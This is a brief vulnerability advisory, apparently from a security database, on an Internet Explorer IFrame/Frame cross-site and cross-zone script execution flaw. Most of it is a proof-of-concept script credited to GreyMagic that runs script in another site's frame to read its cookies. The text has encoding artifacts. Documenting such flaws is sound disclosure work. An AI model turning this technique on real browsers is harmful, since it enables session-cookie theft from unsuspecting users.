Microsoft Internet Explorer IFrame/Frame Cross-Site/Zone Script Execution Vulnerability

Microsoft Internet Explorer IFrame/Frame Cross-Site/Zone Script Execution Vulnerability

A proof of concept has been developed by GreyMagic:

<script language="jscript">
onload=function () {
Â Â Â Â var
oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
ctim","width=100,height=100");
Â Â Â Â setTimeout(
Â Â Â Â Â Â Â Â function () {
Â Â Â Â Â Â Â Â Â Â Â Â oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
Â Â Â Â Â Â Â Â },
Â Â Â Â Â Â Â Â 7000
Â Â Â Â );
}
</script>